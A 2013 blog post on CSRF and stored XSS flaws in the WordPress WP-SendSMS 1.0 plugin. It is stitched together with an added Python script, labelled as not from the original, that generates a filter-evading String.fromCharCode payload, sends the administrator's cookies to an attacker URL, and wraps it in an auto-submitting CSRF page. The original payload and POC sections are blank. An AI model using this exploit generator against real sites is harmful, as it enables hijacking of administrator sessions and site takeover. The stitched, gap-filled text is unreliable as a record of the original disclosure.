Wednesday, 12 June 2013

Wordpress WP-SendSMS Plugin 1.0 - Multiple Vulnerabilities

The WordPress WP-SendSMS plugin 1.0 suffers from CSRF and stored XSS vulnerabilities.
The interesting part is the combination of the two: because the plugin's settings form is not protected against CSRF, an attacker can use the CSRF to plant the stored XSS payload in the settings, and the stored XSS then runs in the administrator's browser and can be used to steal cookies.

So what I did here was craft a simple CSRF exploit page that carries the stored XSS payload. Two problems had to be solved along the way:


1. The stored XSS was there, but a payload that used document.cookie, alert() and similar directly was not executed.
2. The XSS payload had to be embedded inside the CSRF exploit HTML page without being broken by the page's own markup.

To get around the first problem I used String.fromCharCode(ascii value, ...) to build the script text from character codes at runtime, so the stored value contains only digits and commas instead of the blocked keywords. The payload then looks like this:


The above payload redirects the victim to my website with the victim's cookies appended to the URL.

But when this payload is placed inside value="XSS PAYLOAD" in the CSRF form it does not work: the browser parses it as value=""><script>......, i.e. the payload's leading double quote terminates the attribute early, and the field is submitted with an empty value instead of the payload. To get around this, write &quot; in place of " inside the attribute. The browser decodes the entity when it reads the attribute value, so the submitted value is the intended XSS payload and it is stored and rendered by the plugin exactly as if it had been typed into the settings form.
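As an added example (not from the original post, the exploit-db entry, or the plugin's own code), here is a small Python generator for the two encodings described above: the String.fromCharCode wrapper that keeps document.cookie out of the stored value, and the &quot; entity that lets the payload's leading double quote survive inside the CSRF form's value attribute. Only the parameter names come from the post; the settings URL, the attacker URL, the eval() wrapper and the assumption that the plugin echoes the saved setting back inside a value="..." attribute are assumptions. The html.parser check at the end shows what a browser would actually submit with and without the entity encoding.

```python
import html
import re
from html.parser import HTMLParser

# Assumed (hypothetical) target and collector URLs; neither comes from the post.
SETTINGS_URL = "http://victim.example/wp-admin/admin.php?page=wp-sendsms"
ATTACKER_URL = "http://attacker.example/c"

# Parameters the post lists as stored-XSS vulnerable.
VULN_PARAMS = ["sender_id", "maximum_characters", "captcha_width",
               "captcha_height", "captcha_characters"]


def js_to_fromcharcode(js: str) -> str:
    """Rebuild a JavaScript statement from character codes at runtime.

    The stored value then contains only digits and commas, so a filter that
    rejects literal tokens such as 'document.cookie' or 'alert' never sees
    them. The post names String.fromCharCode; the eval() wrapper is assumed.
    """
    codes = ",".join(str(ord(c)) for c in js)
    return f"eval(String.fromCharCode({codes}))"


def decode_fromcharcode(payload: str) -> str:
    """Recover what the victim's browser would execute (checking helper)."""
    m = re.search(r"String\.fromCharCode\(([\d,]+)\)", payload)
    return "".join(chr(int(n)) for n in m.group(1).split(","))


def build_xss_payload(exfil_url: str) -> str:
    """Stored-XSS payload. The leading "> assumes the plugin echoes the saved
    setting inside value="..." (what the post's value=""> description implies);
    the script sends document.cookie to the attacker's URL."""
    js = f"document.location='{exfil_url}?c='+document.cookie"
    return f'"><script>{js_to_fromcharcode(js)}</script>'


def build_csrf_form(action: str, fields: dict, escape: bool) -> str:
    """Auto-submitting CSRF page. With escape=False the payload's own double
    quote terminates the value attribute early (the problem the post hit);
    with escape=True it is written as &quot;, which the browser decodes when
    it reads the attribute, so the full payload is what gets submitted."""
    enc = (lambda v: html.escape(v, quote=True)) if escape else (lambda v: v)
    inputs = "\n".join(
        f'  <input type="hidden" name="{n}" value="{enc(v)}">'
        for n, v in fields.items()
    )
    return (
        f'<form id="csrf" method="POST" action="{action}">\n{inputs}\n</form>\n'
        '<script>document.getElementById("csrf").submit();</script>'
    )


class _HiddenInputs(HTMLParser):
    """Collects name/value of hidden inputs the way a browser's parser would."""
    def __init__(self):
        super().__init__()
        self.values = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.values[a.get("name")] = a.get("value")


def submitted_values(page: str) -> dict:
    """Return the field values a browser would POST from the given page."""
    p = _HiddenInputs()
    p.feed(page)
    return p.values


if __name__ == "__main__":
    payload = build_xss_payload(ATTACKER_URL)
    fields = {VULN_PARAMS[0]: payload}  # any of VULN_PARAMS works per the post
    for escaped in (False, True):
        page = build_csrf_form(SETTINGS_URL, fields, escape=escaped)
        print(f"escape={escaped}: submitted sender_id = "
              f"{submitted_values(page)['sender_id']!r}")
    print(build_csrf_form(SETTINGS_URL, fields, escape=True))
```

Running it prints an empty sender_id for the unescaped form and the full payload for the escaped one, which is exactly the difference the post describes; the decoded String.fromCharCode text is the plain redirect-with-cookies statement the filter would otherwise have blocked.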

For the exploit, see exploit-db.

Stored XSS Details :


Stored XSS Vulnerable Parameters:
1. sender_id
2. maximum_characters
3. captcha_width
4. captcha_height
5. captcha_characters

Vulnerability POC:

The victim's cookies are sent to the attacker's website.

This is how a stored XSS can be exploited through CSRF, which makes for an effective attack. This is for information purposes only.

Published on Exploit-db

1 comment:

  1. Are you sure you are a security researcher?! You do not even know how to explain a simple flaw!